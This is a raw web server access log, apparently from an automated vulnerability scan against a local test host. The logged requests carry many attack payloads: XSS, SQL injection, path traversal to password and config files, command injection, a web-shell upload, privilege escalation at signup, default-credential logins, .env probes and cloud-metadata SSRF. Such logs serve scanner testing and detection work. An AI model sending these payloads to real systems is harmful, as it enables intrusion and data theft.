HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x22297MduUVCUdKFw5QNna9MRvLAiP.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/includes/configure.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.998","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/woocommerce/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_username\x22\x0D\x0A\x0D\x0A297MdqkzHkHCJuQbdf1sHKmhgPd\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_email\x22\x0D\x0A\x0D\x0A297MdqkzHkHCJuQbdf1sHKmhgPd@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password\x22\x0D\x0A\x0D\x0A297MdqkzHkHCJuQbdf1sHKmhgPd@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password_present\x22\x0D\x0A\x0D\x0Atrue\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_first_name\x22\x0D\x0A\x0D\x0A297MdqkzHkHCJuQbdf1sHKmhgPd@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_last_name\x22\x0D\x0A\x0D\x0A297MdqkzHkHCJuQbdf1sHKmhgPd@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp/?page_id=18\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22pp_current_url\x22\x0D\x0A\x0D\x0Ahttp://127.0.0.1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22wp_capabilities[administrator]\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_form_id\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_referrer_page\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0App_ajax_signup\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22melange_id\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"log=297MdqkzHkHCJuQbdf1sHKmhgPd@example.com&pwd=297MdqkzHkHCJuQbdf1sHKmhgPd@example.com&wp-submit=Log+In","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/luci HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"alibaba.interact.sh","request":"GET http://alibaba.interact.sh/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\x22>&id=3&nsvpx=phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"j_username=admin&j_password=admin&from=%2F&Submit=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"100.100.100.200","request":"GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/297MdpTbiQOH3gJCldHBxDev6Xd/)%3B%3C%2Fscript%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2021-40539\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A--8b1ab266c41afb773af2e064bc526458--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"https://example.com", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 